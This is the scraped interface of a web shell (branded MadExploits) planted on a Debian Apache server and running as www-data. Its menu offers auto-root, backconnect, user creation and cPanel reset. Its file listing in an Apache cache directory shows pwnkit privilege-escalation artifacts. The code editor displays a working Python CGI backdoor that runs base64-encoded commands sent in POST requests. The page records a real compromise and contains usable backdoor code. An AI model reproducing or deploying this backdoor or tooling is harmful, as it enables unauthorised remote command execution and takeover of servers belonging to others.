Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.144.255.158
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
cache /
apache2 /
mod_cache_disk /
O /
4 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
DABi_Q4LB6wIa__po9FA.header.va...
[ DIR ]
drwx------
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ltRaGk_cMKRboDCeNfcg.header.va...
[ DIR ]
drwx------
sZRh4niXJrPQH6GkmSng.header.va...
[ DIR ]
drwx------
u6Ob@d8EWEQ11b2XAXAQ.header.va...
[ DIR ]
drwx------
xZJZqs2WY_R4QRMB4Obw.header.va...
[ DIR ]
drwx------
.mad-root
0
B
-rw-r--r--
1FymJPhHkBnpFARtxIkg.data
65.45
KB
-rw-------
1FymJPhHkBnpFARtxIkg.header
690
B
-rw-------
7JmQmpSgLbbgroGW8S@Q.data
9.71
KB
-rw-------
7JmQmpSgLbbgroGW8S@Q.header
630
B
-rw-------
@8S3ZYj2BEusUIVM@Hqw.data
8.16
KB
-rw-------
@8S3ZYj2BEusUIVM@Hqw.header
852
B
-rw-------
DABi_Q4LB6wIa__po9FA.header
31
B
-rw-------
OU1k5XAYM8LUEoN2CgTg.data
123.75
KB
-rw-------
OU1k5XAYM8LUEoN2CgTg.header
613
B
-rw-------
Om6lp8CfHLw5xcuMAMdg.data
463
B
-rw-------
Om6lp8CfHLw5xcuMAMdg.header
636
B
-rw-------
iG_hmiOxW0upfufdEkDA.data
36.44
KB
-rw-------
iG_hmiOxW0upfufdEkDA.header
689
B
-rw-------
jMFbbMao7bTa1tHi@ZcQ.data
27.19
KB
-rw-------
jMFbbMao7bTa1tHi@ZcQ.header
729
B
-rw-------
oAIPZb_@RW_F0hGDfyQw.data
15.01
KB
-rw-------
oAIPZb_@RW_F0hGDfyQw.header
642
B
-rw-------
pwnkit
10.99
KB
-rwxr-xr-x
u6Ob@d8EWEQ11b2XAXAQ.header
31
B
-rw-------
xZJZqs2WY_R4QRMB4Obw.header
31
B
-rw-------
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Om6lp8CfHLw5xcuMAMdg.data
#!/usr/bin/python try: import cgitb; cgitb.enable() except: pass import os,cgi,base64 form = cgi.FieldStorage(environ={'REQUEST_METHOD':'POST'}) cmd = form.getvalue('cmd') check = form.getvalue('check') print "Content-type:text/html\r\n\r\n" if cmd: print base64.b64decode(check)+"<pre>" child_stdin, child_stdout = os.popen2(base64.b64decode(cmd)) child_stdin.close() result = child_stdout.read() child_stdout.close() print result.strip() print "</pre>"
Close